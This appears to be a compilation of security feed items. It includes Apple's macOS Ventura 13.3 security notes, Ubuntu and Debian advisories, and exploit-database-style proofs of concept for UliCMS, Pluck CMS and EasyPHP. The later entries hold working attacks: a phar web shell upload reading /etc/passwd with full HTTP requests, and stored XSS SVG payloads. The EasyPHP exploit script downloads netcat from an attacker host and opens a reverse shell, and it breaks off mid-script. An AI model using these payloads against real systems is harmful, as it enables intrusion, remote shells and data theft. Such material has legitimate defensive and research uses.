A privacy issue was addressed by moving sensitive data to a more secure location. This issue is fixed in macOS Ventura 13.3. An app may be able to access user-sensitive data

Released March 27, 2023

**AMD**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-27968: ABC Research s.r.o.

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2023-23532: Mohamed Ghannam (@\_simo36)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Archive Utility**

Available for: macOS Ventura

Impact: An archive may be able to bypass Gatekeeper

Description: The issue was addressed with improved checks.

CVE-2023-27951: Brandon Dalton (@partyD0lphin) of Red Canary and Csaba Fitzl (@theevilbit) of Offensive Security

Entry updated May 1, 2023

**Calendar**

Available for: macOS Ventura

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu - twitter.com/rizasabuncu

**Camera**

Available for: macOS Ventura

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**Carbon Core**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved checks.

CVE-2023-23534: Mickey Jin (@patch1t)

**ColorSync**

Available for: macOS Ventura

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-27955: JeongOhKyea

**CommCenter**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**CoreCapture**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**curl**

Available for: macOS Ventura

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating curl.

CVE-2022-43551

CVE-2022-43552

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: A memory initialization issue was addressed.

CVE-2023-27934: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A user in a privileged network position may be able to cause a denial-of-service

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-28180: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27953: Aleksandar Nikolic of Cisco Talos

CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

**Display**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2023-27965: Proteas of Pangu Lab

**FaceTime**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed by moving sensitive data to a more secure location.

CVE-2023-28190: Joshua Jones

**Find My**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: macOS Ventura

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**iCloud**

Available for: macOS Ventura

Impact: A file from an iCloud shared-by-me folder may be able to bypass Gatekeeper

Description: This was addressed with additional checks by Gatekeeper on files downloaded from an iCloud shared-by-me folder.

CVE-2023-23526: Jubaer Alnazi of TRS Group of Companies

**Identity Services**

Available for: macOS Ventura

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and jzhu working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-27957: Yiğit Can YILMAZ (@yilmazcanyigit)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google Project Zero

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: macOS Ventura

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2023-27941: Arsenii Kostromin (0x3c3e)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

**LaunchServices**

Available for: macOS Ventura

Impact: Files downloaded from the internet may not have the quarantine flag applied

Description: This issue was addressed with improved checks.

CVE-2023-27943: an anonymous researcher, Brandon Dalton, Milan Tenk, and Arthur Valiev

**LaunchServices**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: This issue was addressed with improved checks.

CVE-2023-23525: Mickey Jin (@patch1t)

**Mail**

Available for: macOS Ventura

Impact: An app may be able to view sensitive information

Description: The issue was addressed with improved checks.

CVE-2023-28189: Mickey Jin (@patch1t)

Entry added May 1, 2023

**Model I/O**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27949: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: macOS Ventura

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**PackageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-23538: Mickey Jin (@patch1t)

CVE-2023-27962: Mickey Jin (@patch1t)

**Photos**

Available for: macOS Ventura

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: A logic issue was addressed with improved restrictions.

CVE-2023-23523: developStorm

**Podcasts**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**Safari**

Available for: macOS Ventura

Impact: An app may bypass Gatekeeper checks

Description: A race condition was addressed with improved locking.

CVE-2023-27952: Csaba Fitzl (@theevilbit) of Offensive Security

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-23533: Mickey Jin (@patch1t), Koh M. Nakagawa of FFRI Security, Inc., and Csaba Fitzl (@theevilbit) of Offensive Security

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved validation.

CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

**SharedFileList**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-27966: an anonymous researcher

Entry added May 1, 2023

**Shortcuts**

Available for: macOS Ventura

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**System Settings**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23542: an anonymous researcher

**System Settings**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A permissions issue was addressed with improved validation.

CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**TCC**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Vim**

Available for: macOS Ventura

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating to Vim version 9.0.1191.

CVE-2023-0049

CVE-2023-0051

CVE-2023-0054

CVE-2023-0288

CVE-2023-0433

CVE-2023-0512

**WebKit Web Inspector**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun) and crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

CVE-2023-27954: an anonymous researcher

**XPC**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with a new entitlement.

CVE-2023-27944: Mickey Jin (@patch1t)

CVE-2023-28190: About the security content of macOS Ventura 13.3

Ubuntu Security Notice 6061-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6061-1May 08, 2023webkit2gtk vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in the WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, a remoteattacker could exploit a variety of issues related to web browser security,including cross-site scripting attacks, denial of service attacks, andarbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   libjavascriptcoregtk-4.0-18     2.40.1-0ubuntu0.23.04.1   libjavascriptcoregtk-4.1-0      2.40.1-0ubuntu0.23.04.1   libjavascriptcoregtk-6.0-1      2.40.1-0ubuntu0.23.04.1   libwebkit2gtk-4.0-37            2.40.1-0ubuntu0.23.04.1   libwebkit2gtk-4.1-0             2.40.1-0ubuntu0.23.04.1   libwebkitgtk-6.0-4              2.40.1-0ubuntu0.23.04.1Ubuntu 22.10:   libjavascriptcoregtk-4.0-18     2.38.6-0ubuntu0.22.10.1   libjavascriptcoregtk-4.1-0      2.38.6-0ubuntu0.22.10.1   libjavascriptcoregtk-5.0-0      2.38.6-0ubuntu0.22.10.1   libwebkit2gtk-4.0-37            2.38.6-0ubuntu0.22.10.1   libwebkit2gtk-4.1-0             2.38.6-0ubuntu0.22.10.1   libwebkit2gtk-5.0-0             2.38.6-0ubuntu0.22.10.1Ubuntu 22.04 LTS:   libjavascriptcoregtk-4.0-18     2.38.6-0ubuntu0.22.04.1   libjavascriptcoregtk-4.1-0      2.38.6-0ubuntu0.22.04.1   libwebkit2gtk-4.0-37            2.38.6-0ubuntu0.22.04.1   libwebkit2gtk-4.1-0             2.38.6-0ubuntu0.22.04.1Ubuntu 20.04 LTS:   libjavascriptcoregtk-4.0-18     2.38.6-0ubuntu0.20.04.1   libwebkit2gtk-4.0-37            2.38.6-0ubuntu0.20.04.1This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6061-1   CVE-2022-0108, CVE-2022-32885, CVE-2023-25358, CVE-2023-27932,   CVE-2023-27954, CVE-2023-28205Package Information:   https://launchpad.net/ubuntu/+source/webkit2gtk/2.40.1-0ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.38.6-0ubuntu0.22.10.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.38.6-0ubuntu0.22.04.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.38.6-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6061-1

UliCMS version 2023-1 Sniffing-Vicuna suffers from a remote shell upload vulnerability.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs:  RCE  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Login to account and edit profile.

2.Upload new Avatar

3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

payload: <?php echo system("cat /etc/passwd"); ?>

poc request :

POST /dist/admin/index.php HTTP/1.1  
Host: localhost  
Content-Length: 1982  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv  
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sClass"

UserController  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sMethod"

update  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="avatar"; filename="salam.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="edit_admin"

edit_admin  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="id"

12  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="firstname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="lastname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="email"

account1@test.com  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password_repeat"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="group_id"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="secondary_groups[]"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="homepage"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="html_editor"

ckeditor  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="admin"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="default_language"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="about_me"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error  
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67  
Stack trace:  
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73  
Stack trace:  
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

UliCMS 2023-1 Sniffing-Vicuna Shell Upload

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

Debian Linux Security Advisory 5396-2 - The webkit2gtk update released as 5396-1 introduced a compatibility problem that caused Evolution to display e-mail incorrectly. Evolution has been updated to solve this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5396-2                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 04, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : evolution  
Debian Bug     : 1035469

The webkit2gtk update released as 5396-1 introduced a compatibility  
problem that caused Evolution to display e-mail incorrectly. Evolution  
has been updated to solve this issue.

For the stable distribution (bullseye), this problem has been fixed in  
version 3.38.3-1+deb11u2.

We recommend that you upgrade your evolution packages.

For the detailed security status of evolution please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/evolution

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmRT6FEACgkQAAyEYu0C  
2ALibg/9FWGsSbwd8IEBJ71YIUsRj9arilW4oj2ur4W0mSIINlBuU+LZi+DyBC0r  
NJmSJWbJHyUBpdvNI6bSkSApUXj91oNuNUxZ4sdyGIHgqh/n8yHLOYdTIozA9Dg7  
6EmHBsy864csERzS5yQCD+MTr4d84tjXm9lb5AlZBW+BjrDPwd1GVqzdTKfLddGx  
pQxehkGsthn4B5pjuvrm0byoHtz8o5jhRlq1CEYOv3+nsvG1ea8CM3YXUH9uef2e  
zi4ib77KxI3GthP9l76/lRB+CRrWMjeqzt6zBPHVV7QJ20E+p8KW+rZqoDwoY9n+  
W3iPDbB/KZVh6/vXNoDBBjKs9HrxjTyvGFYvaNEt9qODAAnwQWtDQoA/nufiD+AY  
NlYqLkKuweXBpgoO+L9c9G+9PX+QLuI7ifi6s/v1iAF0jp+/aiS/PR2q+BPRcikd  
0q/Qg0dFdDUkb8snRJTBI44wSkq7jVBLNJ5CKFYjVbjP+bEtHQKtAw3YIC7mto2W  
VxTHIJLkJw1oiiMZqrg2s/tdVb5WwXRaIkW/1MpS3zLUVWKMOOgQCwqM1TzWulsP  
DJdaNHQW+V1POESkbHM6BY6XgXFGrltR/433h7TzVJSKVO2igDfocOL6JIa7hE7l  
x7MRT7aFA50Ao63lUEyHmK1Sz+qA8Ku0rO8g8URI8v0Djy1BCZI=  
=Az5K  
-----END PGP SIGNATURE-----

Debian Security Advisory 5396-2

Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Pluck CMS 4.7.18 Cross Site Scripting

EasyPHP Webserver version 14.1 suffers from remote code execution and path traversal vulnerabilities.

# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and  
Path Traversal)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-06  
# Vendor Homepage: https://www.easyphp.org/  
# Software Link : https://www.easyphp.org/  
# Tested Version: 14.1  
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8  
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP  
Webserver 14.1 that allows an attacker to achieve Remote Code Execution  
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
Origin: http://127.0.0.1:10000  
Connection: keep-alive  
Referer: http://127.0.0.1:10000/index.php?zone=settings  
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

# !/usr/bin/python3  
import requests  
import sys

if len(sys.argv) != 5:  
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")  
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %  
sys.argv[0])  
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %  
sys.argv[0])  
    exit(1)

else:  
    target = sys.argv[1]  
    targetport = sys.argv[2]  
    localip = sys.argv[3]  
    localport = sys.argv[4]  
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in  
the directory

    payload =  
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"  
+ localip + ':8000' +  
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"  
+ localip + "+" + localport + "+-e+cmd.exe\""  
    print (payload)  
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'  
    headers = {  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
